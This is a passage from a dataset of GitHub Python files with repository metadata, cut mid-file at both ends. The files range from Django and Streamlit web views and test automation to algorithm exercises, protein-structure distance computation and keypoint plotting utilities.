minutes for the response in the output queue\nTIMEOUT_HARD = 60 * 60 # store messages in the output queue for 60 minutes\nTIMEOUT_VISIBILITY = 3 # 3 sec for scanning output queue\n\n\ndef immediate_run(request):\n if request.method == 'POST':\n form = ImmediateForm(request.POST)\n\n if form.is_valid():\n url = form.cleaned_data['url']\n site = form.cleaned_data['site']\n\n response = {\n 'success': True,\n 'url': url,\n }\n\n try:\n # try to find message for the same request\n message = find_message(site, url)\n\n if not message:\n send_message(site, url)\n\n message = find_message(site, url, timeout=TIMEOUT_LITE)\n if message:\n response['sqs'] = message\n\n data = get_data(message)\n if data:\n response['result'] = data\n else:\n response['success'] = False\n response['message'] = 'Task failed. No data'\n else:\n response['message'] = 'Task is not ready yet, check later'\n except Exception as e:\n response['success'] = False\n response['message'] = e.message\n\n return JsonResponse(response)\n else:\n form = ImmediateForm()\n\n return render(request, 'form.html', {'form': form})\n\n\ndef send_message(site, url):\n body = {\n 'site': site,\n 'server_name': SERVER_NAME,\n 'url': url,\n 'response_format': 'sc', # TODO: let to select CH\n 'result_queue': QUEUE_OUTPUT\n }\n\n message = RawMessage()\n message.set_body(json.dumps(body))\n\n queue = get_queue(QUEUE_INPUT)\n queue.write(message)\n\n\ndef find_message(site, url, timeout=None):\n queue = get_queue(QUEUE_OUTPUT)\n\n time_start = time.time()\n\n while timeout is None or time.time() - time_start < timeout:\n # scan output queue\n messages = queue.get_messages(num_messages=10, visibility_timeout=TIMEOUT_VISIBILITY)\n\n for message in messages:\n body = message.get_body()\n\n if isinstance(body, basestring):\n body = json.loads(body)\n\n # remove old messages\n utc_datetime = body.get('utc_datetime', None)\n\n if utc_datetime:\n utc_datetime = parse_date(utc_datetime)\n\n if utc_datetime < datetime.now() - timedelta(seconds=TIMEOUT_HARD):\n queue.delete_message(message)\n\n continue\n\n if body.get('site') == site and body.get('url') == url:\n queue.delete_message(message)\n\n return body\n\n # not repeat\n if timeout is None:\n break\n\n\ndef get_data(body):\n if body.get('status') == 'success':\n bucket = body.get('bucket_name') or 'spyder-bucket'\n json_data_file = body.get('s3_key_data', None) or body.get('s3_filepath', None)\n\n aws_connection = S3Connection()\n bucket = aws_connection.get_bucket(bucket)\n key = bucket.get_key(json_data_file)\n\n return json.loads(key.get_contents_as_string())\n\n\ndef get_queue(name):\n connection = boto.sqs.connect_to_region(\"us-east-1\")\n queue = connection.lookup(name)\n\n if not queue:\n queue = connection.create_queue(name)\n\n return queue\n","repo_name":"aprosdev/ecom-predictor","sub_path":"product-ranking/sqs_tests_gui/immediate/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3923,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"24068472619","text":"\n\nclass Artwork:\n Artist = 'Artist'\n Price = 'Price'\n\nNames = ['Bob', 'James', 'Helen', 'Sam', 'Jess', 'Maria', 'Kat']\nPrice = 7 * ['£100']\n\ndef Assign(Artwork, Parameter):\n for param in Parameter:\n Artwork.Parameter = param\n print(Artwork.Parameter)\n\nAssign(Artwork, Names)\nAssign(Artwork, Price)\n","repo_name":"CharlizeY/ArtWorldInsights","sub_path":"Artprice/Testing/TestFind.py","file_name":"TestFind.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43615763810","text":"from django.contrib.admin.views.decorators import staff_member_required\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import get_object_or_404\nfrom django.utils.translation import ugettext as _\n\nfrom snapboard.auth.decorators import login_required\nfrom snapboard.forms import *\nfrom snapboard.models import *\nfrom snapboard.utils import *\n\n\n# Ajax\n# ----\n\n@json_response\ndef preview(request):\n return {'preview': sanitize(request.POST.get('text', ''))}\n\n@staff_member_required\n@json_response\ndef sticky(request):\n thread = get_object_or_404(Thread, pk=request.POST.get('id'))\n if toggle_boolean_field(thread, 'sticky'):\n return {'link':_('unstick'), 'msg':_('This topic is sticky!')}\n else:\n return {'link':_('stick'), 'msg':_('This topic is not sticky.')}\n\n@staff_member_required\n@json_response\ndef close(request):\n thread = get_object_or_404(Thread, pk=request.POST.get('id'))\n if toggle_boolean_field(thread, 'closed'):\n return {'link':_('open'), 'msg':_('This topic is closed.')}\n else:\n return {'link':_('close'), 'msg':_('This topic is open.')}\n\n@login_required\n@json_response\ndef watch(request):\n thread = get_object_or_404(Thread, pk=request.POST.get('id'))\n try:\n # TODO: how to delete this rel\n # thread.subscribers.objects.get(user=request.user, thread=thread).delete()\n return {\n 'link': _('watch'), \n 'msg': _('This topic has been removed from your favorites.')\n }\n except: # WatchList.DoesNotExist:\n WatchList.objects.create(user=request.user, thread=thread)\n return {\n 'link': _('dont watch'), \n 'msg': _('This topic has been added to your favorites.')\n }\n\n@login_required\n@json_response\ndef edit(request):\n pk = request.POST.get('id')\n post = get_object_or_404(Post.objects.get_user_query_set(request.user), pk=pk)\n form = PostForm(request.POST, request=request, instance=post)\n if form.is_valid():\n post = form.save()\n return {'preview': sanitize(post.text)}\n return form.errors\n\n# Views\n# -----\n\ndef category_list(request, template='snapboard/category_list.html'):\n ctx = {'categories': Category.objects.all()} \n return render_and_cache(template, ctx, request)\n\ndef category(request, slug, template='snapboard/category.html'):\n category = get_object_or_404(Category, slug=slug)\n threads = category.thread_set.get_user_query_set(request.user)\n ctx = {'category': category, 'threads': threads}\n return render_and_cache(template, ctx, request)\n\ndef thread_list(request, template='snapboard/thread_list.html'):\n # TODO: Keep sticky posts from clogging up the list.\n threads = Thread.objects.get_user_query_set(request.user).order_by('-date')\n return render_and_cache(template, {'threads': threads}, request)\n\ndef thread(request, cslug, tslug, template='snapboard/thread.html'):\n thread = get_object_or_404(Thread.objects.filter(category__slug=cslug), slug=tslug)\n form = PostForm(request.POST or None, request=request)\n if form.is_valid():\n post = form.save(thread)\n return HttpResponseRedirect(post.get_url())\n \n ctx = {\n 'is_fav': thread.is_fav(request.user),\n 'posts': thread.get_posts(),\n 'thread': thread,\n 'form': form,\n 'category': thread.category\n }\n return render_and_cache(template, ctx, request)\n\ndef search(request, template='snapboard/search.html'):\n threads = Thread.objects.get_user_query_set(request.user)\n q = request.GET.get('q')\n if q is not None:\n threads = threads.filter(name__icontains=q)\n return render(template, {'threads': threads}, request)\n\n@login_required\ndef new_thread(request, slug=None, template='snapboard/new_thread.html'):\n category = None\n if slug is not None:\n category = get_object_or_404(Category, slug=slug)\n form = ThreadForm(request.POST or None, request=request, category=category)\n if form.is_valid():\n thread = form.save()\n return HttpResponseRedirect(thread.get_url())\n return render(template, {'form': form, 'category': category}, request)\n\n@login_required\ndef favorites(request, template='snapboard/favorites.html'):\n threads = Thread.objects.favorites(request.user)\n return render(template, {'threads': threads}, request)\n\n@login_required\ndef edit_settings(request, template='snapboard/edit_settings.html'):\n settings, _ = UserSettings.objects.get_or_create(user=request.user)\n data = request.POST or None\n sform = UserSettingsForm(data, instance=settings, request=request)\n uform = UserNameForm(data, instance=request.user)\n if request.POST:\n if sform.is_valid() and uform.is_valid():\n sform.save()\n uform.save()\n request.user.message_set.create(message='Preferences Updated.')\n return HttpResponseRedirect('')\n return render(template, {'sform': sform, 'uform': uform}, request)","repo_name":"johnboxall/snapboard","sub_path":"snapboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4988,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"61"} +{"seq_id":"5185506586","text":"import os\nimport streamlit as st\nimport requests\n\n# init page settings\nBACKEND_URL = os.getenv(\"BACKEND_URL\")\n\nst.set_page_config(page_title=\"URURL\")\n\nst.title(\"URURL.LIFE\")\nst.write(\"Make your url short and easy to share!\")\n\n# init session states\nif 'request_session' not in st.session_state.keys():\n st.session_state['request_session'] = requests.Session()\n\nif \"user\" not in st.session_state.keys():\n st.session_state[\"user\"] = None\n\n\n# random url generator layout\nwith st.form(\"random_form\"):\n st.text_input(\"your url\", key=\"random_origin\")\n random_sumitted = st.form_submit_button(\"Shorten!\")\n\n# generate random url\nif random_sumitted:\n r = requests.post(\n f\"{BACKEND_URL}/api/generate\",\n json={\"origin\": st.session_state.get(\"random_origin\")},\n )\n if r.status_code == 200 or r.status_code == 201:\n left, _ = st.columns(2)\n left.success(f\"ururl is: {r.text}\")\n st.balloons()\n elif r.status_code / 100 in (4, 5):\n st.error(f\"{r.status_code} Error: {r.text}\")\n\n\n# make extra space\nfor _ in range(2):\n st.text(\"\\n \")\n\n\n# if logged in, show custom url generator\nif st.session_state['user']:\n st.header(\"Customize!\")\n st.write(\"You can make your own url!\")\n\n with st.form(\"custom_form\"):\n st.text_input(\"your url\", key=\"custom_origin\")\n st.text_input(\n \"custom id\",\n placeholder = \"\" if st.session_state['user'] else \"signin required\",\n key=\"custom_id\",\n disabled=not st.session_state['user'],\n )\n custom_sumitted = st.form_submit_button(\"Shorten!\")\n\n if custom_sumitted:\n if not st.session_state[\"custom_id\"]:\n st.error(\"signin required\")\n else:\n r = st.session_state['request_session'].post(\n f\"{BACKEND_URL}/api/custom/generate\",\n json={\"origin\": st.session_state[\"custom_origin\"], \"id\": st.session_state[\"custom_id\"]},\n )\n if r.status_code == 200 or r.status_code == 201:\n left, _ = st.columns(2)\n left.success(f\"ururl is: {r.text}\")\n st.balloons()\n elif r.status_code / 100 in (4, 5):\n st.error(f\"{r.status_code} Error: {r.text}\")\n\n# signin layout\nelse:\n st.header(\"Sign in\")\n st.markdown(\"\"\"Don't have an account? Sign up\"\"\", unsafe_allow_html=True)\n with st.form(\"signin_form\"):\n st.text_input(\"username\", key=\"signin_username\")\n st.text_input(\"password\", key=\"signin_password\", type=\"password\")\n signin_sumitted = st.form_submit_button(\"Sign in\")\n\n if signin_sumitted:\n r: requests.Response = st.session_state['request_session'].post(\n f\"{BACKEND_URL}/api/account/signin\",\n json={\n \"username\": st.session_state[\"signin_username\"],\n \"password\": st.session_state[\"signin_password\"],\n },\n )\n if r.status_code == 200:\n st.session_state[\"request_session\"].headers.update({\"X-CSRFToken\": r.cookies[\"csrftoken\"]})\n st.session_state[\"user\"] = st.session_state['request_session'].cookies.get_dict()\n elif r.status_code / 100 in (4, 5):\n st.error(f\"{r.status_code} Error: {r.text}\")\n st.experimental_rerun()\n","repo_name":"ChangHoon-Sung/ururl-front","sub_path":"🏡_Home.py","file_name":"🏡_Home.py","file_ext":"py","file_size_in_byte":3317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15825831171","text":"from kivy.uix.widget import Widget\nfrom sprite import *\n#zmeiniajacy sie background - skoro juz ustalilem ze moge tylko sie odwolac do klasy w gamie zeby ja dodac jako widzet, a sourca sobie zrobic tutaj, to chcialbym\n#zrobic tutaj liste tel - przez ktore w jakichs sposob bedzie sie iterowac na takiej zasadzie jak w tej klasie. oczywiscie dalej bede musial rozkminic w jaki sposob bedzie\n#aktywowana zmiana poziomu, ale tutaj to chyba bedzie mozna zrobic na boolu.\nclass Background(Widget):#tworzy widzet\n def __init__(self):#przywoluje source jako cos gddzie bedzie wstawiany img lub atlas\n super(Background,self).__init__()#superuje ja zeby mozna bylo to uzyc w innych klasach(?)\n self.bacgrounds = [] #lista, ktora zawieralaby te rozne backgroundy.\n self.image = Sprite(source = 'img/1.png')#tworzy zmienna obrazu ktory jest subklasa sprajta\n self.add_widget(self.image)#dodaje obraz jako widzet(?)\n self.size = self.image.size#ustala rozmiar widzeta jako rozmiar obrazuCHYBA\n self.image_dupe = Sprite(source='img/1.png', x=self.width)#przywoluje drugi obrazek, z szerokoscia poprzedniego jako pozycja wyswietlajac go po nim\n self.add_widget(self.image_dupe)#wyswietla!! najwyrazniej widzet\n def update(self):\n self.image.x -= 2 #przesuwa pierwszy background w lewo\n self.image_dupe.x -= 2#przesuwa nastepny sprajt tez w lewo\n\n if self.image.right <= 0: #jesli prawa strona obrazka jest wieksza lub rowna zero(?)\n self.image.x = 0 #ustawia pierwszy obrazek w pierwotnej pozycji\n self.image_dupe.x = self.width #ustawia drugi obrazek w tamtym miejscu gdzie byl\n\n","repo_name":"ESPP-ZDT/infinite_darkness","sub_path":"background.py","file_name":"background.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8404823198","text":"# coding=utf-8\nimport sys,os\n# curPath = os.path.abspath(os.path.dirname(__file__))\n# rootPath = os.path.split(curPath)[0]\n# sys.path.append(rootPath)\n\nsys.path.append(os.getcwd())\nfrom appium import webdriver\nfrom test0304_1.scripts.search.search import Search_page\nimport pytest\n\nclass Test_search_text:\n def setup_class(self):\n\n desired_caps = {}\n desired_caps[\"platformVersion\"] = \"6.0.1\"\n # 允许输入中文\n desired_caps['unicodeKeyboard'] = True\n desired_caps['resetKeyboard'] = True\n\n desired_caps[\"deviceName\"] = \"192.168.2.168:5555\"\n desired_caps[\"platformName\"] = \"Android\"\n desired_caps[\"appPackage\"] = \"com.android.settings\"\n desired_caps[\"appActivity\"] = \".GridSettings\"\n\n self.driver = webdriver.Remote('http://127.0.0.1:4723/wd/hub', desired_caps)\n\n self.search_ojb = Search_page(self.driver)\n\n def teardown_class(self):\n self.driver.quit()\n\n @pytest.mark.parametrize(\"text\",[1,2,3])\n def test_search(self,text):\n self.search_ojb.search_text(text)\n\n\n","repo_name":"szfwl/J_TEST","sub_path":"test0304_1/scripts/test_02.py","file_name":"test_02.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3239235096","text":"# https://leetcode.com/problems/digit-count-in-range/discuss/303469/Amazing-O(logN)-python-7-lines\n\n# Same as question 233. Number of Digit One\n# class Solution:\n# def countDigitOne(self, n: int) -> int:\n# pivot, res = 1, 0\n# while n >= pivot:\n# res += n // (10 * pivot) * pivot + min(pivot, max(n % (10 * pivot) - pivot + 1, 0))\n# pivot *= 10\n# return res\n# We should care when d == 0 in this question.\n\nclass Solution:\n def digitsCount(self, d: int, low: int, high: int) -> int:\n def helper(n, k):\n pivot, res = 1, 0\n while n >= pivot:\n res += (n // (10 * pivot)) * pivot + min(pivot, max(n % (10 * pivot) - k * pivot + 1, 0))\n res -= pivot if k == 0 else 0 # no leading zero\n pivot *= 10\n return res + 1 # last-digit can be zero\n return helper(high, d) - helper(low-1, d)","repo_name":"chien-wei/LeetCode","sub_path":"1067_Digit_Count_in_Range.py","file_name":"1067_Digit_Count_in_Range.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33847677162","text":"from selenium import webdriver\nimport pytest\n\nclass TestA():\n @pytest.yield_fixture()\n def test_setup(self):\n self.driver = webdriver.Chrome(executable_path=r\"C:\\Users\\bhavy\\PycharmProjects\\amazon\\drivers\\chromedriver.exe\")\n self.driver.get(\"https://letskodeit.teachable.com/pages/practice\")\n yield\n self.driver.close()\n print('Test completed')\n\n def test_login(self,test_setup):\n print(\"Login success\")\n\n","repo_name":"bhavyarani123/nn","sub_path":"try/test_pp.py","file_name":"test_pp.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40187891371","text":"from miflora.miflora_poller import HistoryEntry\nfrom datetime import datetime\nimport math\n\nclass HistoryItem(object):\n\n def __init__(self, tag: str, entry: HistoryEntry, batery_level: int, firmware_version: str):\n self.plant_tag = tag\n # self.device_time = entry.device_time\n self.device_time = math.trunc(entry.wall_time.timestamp())\n self.temperature = entry.temperature\n self.light = entry.light\n self.moisture = entry.moisture\n self.conductivity = entry.conductivity\n self.batery_level = batery_level\n self.firmware_version = firmware_version\n","repo_name":"dragoscirjan/my-flora","sub_path":"flora-server/flora/models/history_item.py","file_name":"history_item.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16216123149","text":"\"\"\"\nCreated on : 10:29 AM\nAuthor : Xue Zhang\n\"\"\"\n\n\ndef get_root(i, links):\n while i != links[i]:\n i = links[links[i]]\n return i\n\n\ndef roads_and_libraries(n, c_lib, c_road, cities):\n if c_lib < c_road:\n return n * c_lib\n links = {i: i for i in range(1, n+1)}\n length = {i: 1 for i in range(1, n+1)}\n for a, b in cities:\n a = get_root(a, links)\n b = get_root(b, links)\n if a != b:\n if length[b] > length[a]:\n a, b = b, a\n links[b] = a\n length[a] += length[b]\n keys = [k for k in links if k == links[k]]\n ans = {}\n for k in keys:\n ans[k] = length[k] - 1\n total = len(ans) * c_lib + sum([c_road * v for v in ans.values()])\n return total\n\n\nif __name__ == '__main__':\n q = int(input())\n\n for _ in range(q):\n nmC_libC_road = input().split()\n\n n_city = int(nmC_libC_road[0])\n\n m_road = int(nmC_libC_road[1])\n\n cost_lib = int(nmC_libC_road[2])\n\n cost_road = int(nmC_libC_road[3])\n\n cs = []\n\n for _ in range(m_road):\n cs.append(list(map(int, input().rstrip().split())))\n\n result = roads_and_libraries(n_city, cost_lib, cost_road, cs)\n\n print(result)\n","repo_name":"xiaoxue11/hank_practice","sub_path":"Graph/01_minCostLibrary.py","file_name":"01_minCostLibrary.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44478968610","text":"# Question: Intersection of two sets. Given two arrays 𝚊[] and 𝚋[], each containing \n# n distinct 2D points in the plane, design a subquadratic algorithm to count the \n# number of points that are contained both in array 𝚊[] and array 𝚋[].\n\n# Solution: Sort arrays a and b (takes O(m log m + n log n) time)\n# \tFind union / intersection of two sorted arrays\n\n\narr1.sort()\n\ndef printIntersection(arr1, arr2, m, n):\n\tarr1.sort()\n\tarr2.sort()\n\n\ti, j = 0, 0\n\twhile i < m and j < n:\n\t\tif arr1[i] < arr2[j]:\n\t\t\ti += 1\n\t\telif arr2[j] < arr1[i]:\n\t\t\tj += 1\n\t\telse:\n\t\t\tprint(arr2[j])\n\t\t\tj += 1\n\t\t\ti += 1\n\n","repo_name":"seungjin-kim/Princeton-Algorithms-Course","sub_path":"Part 1/interview_questions/elementary_sorts/intersection_oc_two_sets_python.py","file_name":"intersection_oc_two_sets_python.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25709630795","text":"def binary_search(arr, x):\n \"\"\"\n Binary search, finding the corresponding last name inside the array\n\n :param arr: List of chess player array\n :param x: the input keywords for last name\n :return: found, which is the object that matches with the x value\n \"\"\"\n # getting the middle index by dividing length of the array\n m = len(arr) // 2\n found = None\n\n while x.lower() != arr[m].last_name.lower():\n # if middle less than 1, it will break the loop\n if m < 1:\n break\n\n if arr[m].last_name.lower() > x.lower():\n arr = arr[:len(arr) // 2]\n\n else:\n start = len(arr) // 2 + 1\n\n if start >= len(arr):\n start = len(arr) // 2\n\n arr = arr[start:]\n\n m = len(arr) // 2\n # if the last name matches with x, print the object details\n if arr[m].last_name.lower() == x.lower():\n print('yay! Found this: ')\n found = arr[m]\n print(f' {found}')\n else:\n print('sorry :(')\n print(f'Player {x} not found')\n\n return found\n","repo_name":"lanangwisnugiri/Chess-players-finder","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42201816423","text":"import os\nimport subprocess\n\nTrialNumber = 1\n\nAccelerationSet = [\"400\", \"600\", \"800\", \"1000\", \"1200\", \"1400\", \"1600\", \"1800\", \"2000\", \"2200\"]\nVelocitySet = [\"200\", \"300\", \"400\", \"500\", \"600\", \"700\", \"800\", \"900\", \"1000\", \"1100\"]\ncounter1 = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\ncounter2 = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\n\nfor i in counter1:\n for j in counter2:\n acceleration = AccelerationSet[i]\n velocity = VelocitySet[j]\n trialString = str(TrialNumber)\n parameterString = trialString + \"|\" + acceleration + \"|\" + velocity\n sendData = parameterString.encode()\n child = subprocess.run([\"python\", \"main.py\"], input= sendData)\n TrialNumber += 1\n\n\n\n\n\n","repo_name":"Callum-Welsh/Cat-And-Rat-Experiment","sub_path":"Experiment.py","file_name":"Experiment.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31762133618","text":"#!/usr/bin/env python\nfrom math import sqrt as msqrt\nfrom scipy import *\nimport pdbParse\nimport sys, os, glob, errno\nfrom scipy.spatial.distance import cdist\nimport time\n\ncode = pdbParse.residueCode\nextracode = {'ABA': 'GLU', 'B3L': 'LEU', 'CAS': 'CYS', 'CIR': 'ARG', 'CME':\n 'CYS', 'CMT': 'CYS', 'CSD': 'CYS', 'CSO': 'CYS', 'CSS': 'CYS',\n 'CY0': 'CYS', 'FCL': 'PHE', 'KCX': 'LYS', 'L3O': 'LEU', 'LGY':\n 'LYS', 'MEA': 'PHE', 'MHO': 'MET', 'MSE': 'MET', 'NMM': 'ARG',\n 'OCS': 'CYS', 'OCY': 'CYS', 'PFF': 'TYR', 'PTR': 'TYR', 'SCS':\n 'CYS', 'SEP': 'SER', 'TPO': 'THR', 'TYI': 'TYR'}\ncode.update(dict((k, code[v]) for k,v in extracode.items()))\ncode = {k.encode('ascii'): v for k,v in code.items()}\n#note that these extra codes are unreliable, since some PDBS assign the same\n#name to different residues. So correct for that using MODRES below\n\nPDBdir = sys.argv[1]\nminL = int(sys.argv[2])\n\ndef mkdir_p(path):\n try:\n os.makedirs(path)\n except OSError as exc: # Python >2.5\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else: raise\n\nmkdir_p('distancesNHA')\nmkdir_p('distancesSCC')\nmkdir_p('distancesSCNHA')\nmkdir_p('distancesCA')\nmkdir_p('distancesCB')\n\ndef vdist(a,b):\n return sqrt(sum((a-b)**2))\n\n\nfor pdbfn in glob.glob(PDBdir + '/*'):\n pdb = os.path.splitext(os.path.basename(pdbfn))[0]\n print(pdb)\n p = pdbParse.loadPDB(pdbfn)\n if len(p) == 0:\n print(\"Empty file? \", pdbfn)\n chains = [c for c in set(p.chain)]\n\n for chain in chains:\n name = pdb+'_'+chain.decode('ascii')\n\n if os.path.exists(os.path.join('distancesCB', name+'.npy')):\n print(\"Already done {}\".format(name))\n continue\n\n #get atoms, but remove unknown residues and remove duplicate conformers\n #Important that this is done in exactly the same way as in\n #getPDBseq.py so that \"seen\" residue indexes match\n c = p[(p.chain == chain)]\n c = c[((c.altLoc == b' ') | (c.altLoc == b'A')) & (c.resName != b'UNK')]\n\n CA = c[c.atom == b' CA ']\n\n resids = CA.resID\n L = len(resids)\n pairs = [(i,j) for i in range(L-1) for j in range(i+1,L)]\n\n if L < minL:\n print(\"Skipping {}: too short at L={}\".format(name, L))\n continue\n\n # compute Nearest-heavy-atom (NHA) distances\n atoms = c[c.element != b' H']\n atomids = atoms.resID\n cc = [atoms.coords[argwhere(atomids == id).ravel()] for id in resids]\n NHAdist = array([min(cdist(cc[i], cc[j]).ravel()) for i,j in pairs])\n\n # compute side-chain Nearest-heavy-atom (SCNHA) distances\n atoms = c[(c.element != b' H') & (c.atom != b' C ') &\n (c.atom != b' O ') & (c.atom != b' N ') &\n ((c.atom != b' CA ') | (c.resName == b'GLY'))]\n atomids = atoms.resID\n cc = [atoms.coords[argwhere(atomids == id).ravel()] for id in resids]\n cc = [ci if ci.size != 0 else [[nan,nan,nan]] for ci in cc]\n SCNHAdist = array([min(cdist(cc[i], cc[j]).ravel()) for i,j in pairs])\n\n # compute side-chain center (SCC) distances\n scc = array([mean(ci, axis=0) for ci in cc])\n SCCdist = cdist(scc, scc)[triu_indices(L,k=1)]\n\n # compute CA distance\n CAdist = cdist(CA.coords, CA.coords)[triu_indices(L,k=1)]\n\n # compute CB distance. Count CA as CB for gly\n CB = c[(c.atom == b' CB ') |\n ((c.atom == b' CA ') & (c.resName == b'GLY'))]\n inds = [argwhere(CB.resID == id).ravel() for id in resids]\n cc = array([CB.coords[ind[0]] if len(ind) > 0 else [nan,nan,nan]\n for ind in inds])\n CBdist = cdist(cc, cc)[triu_indices(L,k=1)]\n\n # sanity checks\n assert(len(CAdist) == len(CBdist))\n assert(len(CAdist) == len(NHAdist))\n # sanity check for clashes\n clashes = [(resids[i], resids[j]) for n,(i,j) in enumerate(pairs)\n if abs(i-j) > 4 and NHAdist[n] < 2.0]\n # 2.0 isdistance at which pymol draws bonds\n if len(clashes) > 0:\n clashes = [(x.decode('ascii'),y.decode('ascii')) for x,y in clashes]\n print('Clashes for pdb {} in residues {}'.format(name, clashes))\n\n save(os.path.join('distancesNHA', name), NHAdist)\n save(os.path.join('distancesSCC', name), SCCdist)\n save(os.path.join('distancesSCNHA', name), SCNHAdist)\n save(os.path.join('distancesCA', name), CAdist)\n save(os.path.join('distancesCB', name), CBdist)\n","repo_name":"ComputationalBiophysicsCollaborative/Kinase_Analysis","sub_path":"structure/getDists.py","file_name":"getDists.py","file_ext":"py","file_size_in_byte":4587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70834090115","text":"import json\r\n\r\ntry:\r\n with open(\"logs.json\", \"r\") as file:\r\n logs = json.load(file)\r\nexcept FileNotFoundError:\r\n logs = {}\r\n\r\nlast_version = \"未公布\"\r\nlast_contrib = \"1304870761\"\r\n\r\nwhile True:\r\n version = input(f\"请输入版本号 ({last_version}): \") or last_version\r\n page = int(input(\"请输入页码: \"))\r\n update_type = int(input(\"请输入更新类型 (默认为0): \") or 0)\r\n contrib = input(\"请输入贡献��� (默认为空字符串): \") or last_contrib\r\n pre_text = input(\"请输入此前文本: \")\r\n post_text = input(\"请输入此后文本: \")\r\n\r\n last_version = version\r\n last_contrib = contrib\r\n \r\n new_entry = {\"page\": page, \"type\": update_type, \"contrib\": contrib, \"pre\": pre_text, \"post\": post_text}\r\n\r\n if version not in logs:\r\n logs[version] = []\r\n\r\n logs[version].append(new_entry)\r\n\r\n with open(\"logs.json\", \"w\") as file:\r\n json.dump(logs, file, indent=4)\r\n\r\n print(\"添加成功\")\r\n","repo_name":"Lawaxi/clayden_update","sub_path":"logs/appendAssistant.py","file_name":"appendAssistant.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"61"} +{"seq_id":"13363571953","text":"import matplotlib.pyplot as plt\nimport torch\nimport numpy as np\n\ndef show_key_points(image, keypoints, pred_keypoints=None):\n plt.imshow(np.squeeze(image), cmap=\"gray\")\n plt.scatter(keypoints[:, 0], keypoints[:, 1], s=20, marker='.', c='m')\n if pred_keypoints is not None:\n plt.scatter(pred_keypoints[:, 0], pred_keypoints[:, 1], s=20, marker='.', c='g')\n\ndef show_multiple_images(images, keypoints):\n fig = plt.figure()\n for i, image in enumerate(images):\n ax = fig.add_subplot(3,4,i+1, xticks=[], yticks=[])\n ax.imshow(np.squeeze(image), cmap=\"gray\")\n ax.scatter(keypoints[:, 0], keypoints[:, 1], s=20, marker='.', c='m')\n\n\ndef net_sample_output(test_loader, net):\n for i, sample in enumerate(test_loader):\n\n images = sample['image']\n key_pts = sample['keypoints']\n\n images = images.type(torch.FloatTensor)\n\n output_pts = net(images)\n\n output_pts = output_pts.view(output_pts.size()[0], 68, -1)\n\n if i == 0:\n return images, output_pts, key_pts\n\ndef denormalize_keypoints(keypoints):\n return ((keypoints*50)+100)\n\ndef show_all_keypoints(image, predicted_key_pts, gt_pts=None):\n \"\"\"Show image with predicted keypoints\"\"\"\n # image is grayscale\n plt.imshow(image, cmap='gray')\n plt.scatter(predicted_key_pts[:, 0], predicted_key_pts[:, 1], s=20, marker='.', c='m')\n # plot ground truth points as green pts\n if gt_pts is not None:\n plt.scatter(gt_pts[:, 0], gt_pts[:, 1], s=20, marker='.', c='g')\ndef visualize_output(test_images, test_outputs, gt_pts=None, batch_size=10):\n for i in range(batch_size):\n plt.figure(figsize=(20, 10))\n ax = plt.subplot(1, batch_size, i + 1)\n\n # un-transform the image data\n image = test_images[i].data # get the image from it's wrapper\n image = image.numpy() # convert to numpy array from a Tensor\n image = np.transpose(image, (1, 2, 0)) # transpose to go from torch to numpy image\n\n # un-transform the predicted key_pts data\n predicted_key_pts = test_outputs[i].data\n predicted_key_pts = predicted_key_pts.numpy()\n # undo normalization of keypoints\n predicted_key_pts = predicted_key_pts * 50.0 + 100\n\n # plot ground truth points for comparison, if they exist\n ground_truth_pts = None\n if gt_pts is not None:\n ground_truth_pts = gt_pts[i]\n ground_truth_pts = ground_truth_pts * 50.0 + 100\n\n # call show_all_keypoints\n show_all_keypoints(np.squeeze(image), predicted_key_pts, ground_truth_pts)\n\n plt.axis('off')\n\n plt.show()\n","repo_name":"aboelela924/CVND","sub_path":"facialKeyPointDetection/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22539826324","text":"from configparser import ConfigParser\nimport time\n\nimport requests\n\nparser = ConfigParser()\nparser.read('login.ini')\nusername = parser.get('user', 'username')\npassword = parser.get('user', 'password')\nurl = 'http://192.168.1.3:8090/login.xml'\nloginmode = 191\nlivemode = 192\ntimeout = 170\ndata = {\n 'mode': loginmode,\n 'username': username,\n 'password': password,\n 'a': str(time.time()),\n 'producttype': '0'\n}\ntry:\n r = requests.post(url=url, data=data)\n if(r.ok):\n print('Login successful for 